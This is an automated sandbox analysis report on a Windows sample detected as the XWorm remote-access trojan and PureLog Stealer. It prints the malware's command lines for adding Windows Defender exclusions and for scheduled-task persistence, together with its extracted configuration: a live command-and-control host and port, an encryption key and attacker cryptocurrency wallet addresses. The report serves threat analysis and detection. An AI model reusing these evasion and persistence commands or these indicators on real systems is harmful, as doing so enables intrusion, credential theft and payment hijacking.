Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Analysis ID:1475711
MD5:7fda9f799b84a7ed802f7127869d5e81
SHA1:55137aa833ee1653f52378599aad376073264499
SHA256:96c861fca93e9209acb17b95b4253f3c26f483ad7dd9eebe15da3067299ef1ac
Tags:exe
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe" MD5: 7FDA9F799B84A7ED802F7127869D5E81)
    • powershell.exe (PID: 7824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • pNYyTm.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\pNYyTm.exe MD5: 7FDA9F799B84A7ED802F7127869D5E81)
    • schtasks.exe (PID: 4676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • pNYyTm.exe (PID: 1132 cmdline: "C:\Users\user\AppData\Roaming\pNYyTm.exe" MD5: 7FDA9F799B84A7ED802F7127869D5E81)
  • cleanup
{"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1817f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x2245b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x2ccdf:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1821c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x224f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x2cd7c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x18331:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x2260d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x2ce91:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x17d11:$cnc4: POST / HTTP/1.1
      • 0x21fed:$cnc4: POST / HTTP/1.1
      • 0x2c871:$cnc4: POST / HTTP/1.1
      00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x16923:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x20bff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x2b4f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x169c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x20c9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x2b590:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x16ad5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x20db1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x2b6a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x164b5:$cnc4: POST / HTTP/1.1
        • 0x20791:$cnc4: POST / HTTP/1.1
        • 0x2b085:$cnc4: POST / HTTP/1.1
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          19.2.pNYyTm.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            19.2.pNYyTm.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x863d:$cnc4: POST / HTTP/1.1
            1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              15.2.pNYyTm.exe.33e2d7c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 19 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ProcessId: 7824, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ProcessId: 7824, ProcessName: powershell.exe
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessId: 8096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pNYyTm.exe, ParentImage: C:\Users\user\AppData\Roaming\pNYyTm.exe, ParentProcessId: 8164, ParentProcessName: pNYyTm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", ProcessId: 4676, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ProcessId: 7824, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                Timestamp:07/18/24-08:39:03.973866
                SID:2852874
                Source Port:30608
                Destination Port:49708
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-08:39:13.060374
                SID:2852870
                Source Port:30608
                Destination Port:49708
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-08:35:28.425606
                SID:2855924
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-08:39:13.061283
                SID:2852923
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-08:36:45.798419
                SID:2853193
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T08:35:28.425606+0200
                SID:2855924
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T08:39:13.060374+0200
                SID:2852870
                Source Port:30608
                Destination Port:49708
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T08:39:13.061283+0200
                SID:2852923
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T08:39:03.973866+0200
                SID:2852874
                Source Port:30608
                Destination Port:49708
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T08:36:45.798419+0200
                SID:2853193
                Source Port:49708
                Destination Port:30608
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: moneymaker-30608.portmap.hostAvira URL Cloud: Label: phishing
                Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeReversingLabs: Detection: 34%
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeVirustotal: Detection: 36%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeJoe Sandbox ML: detected
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: moneymaker-30608.portmap.host
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: 30608
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: <123456789>
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: <Xwormmm>
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: XWorm V5.2
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: USB.exe
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: %AppData%
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: XClient.exe
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: bc1qz32y9es3p6hv6xs4kpqn4sqmrrr888qfyp67hm
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: 0xCe6C8E673e5d9aE4Ee7F357fE94b7EC06B52f3Fd
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpackString decryptor: TSoemRqDkQLR8bnFkw6tsBTUAaAyCujx5y
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 193.161.193.99:30608
                Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 193.161.193.99:30608 -> 192.168.2.10:49708
                Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.10:49708 -> 193.161.193.99:30608
                Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 193.161.193.99:30608 -> 192.168.2.10:49708
                Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 193.161.193.99:30608
                Source: Malware configuration extractorURLs: moneymaker-30608.portmap.host
                Source: global trafficTCP traffic: 192.168.2.10:49708 -> 193.161.193.99:30608
                Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: moneymaker-30608.portmap.host
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, pNYyTm.exe, 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 1_2_0144DE6C1_2_0144DE6C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 1_2_059697E01_2_059697E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_00A9453014_2_00A94530
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_00A9135814_2_00A91358
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_00A93F3814_2_00A93F38
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_00A91A0A14_2_00A91A0A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_06452F7014_2_06452F70
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_06457C3814_2_06457C38
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_06459CD814_2_06459CD8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_0645384014_2_06453840
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_0645578814_2_06455788
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeCode function: 14_2_06452C2814_2_06452C28
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_019CDE6C15_2_019CDE6C
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06447CD815_2_06447CD8
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064434E815_2_064434E8
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_0644155915_2_06441559
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_0644156815_2_06441568
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064430B015_2_064430B0
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_0644113015_2_06441130
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_06440CF815_2_06440CF8
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 15_2_064597E015_2_064597E0
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeCode function: 19_2_012D135819_2_012D1358
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1306863840.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
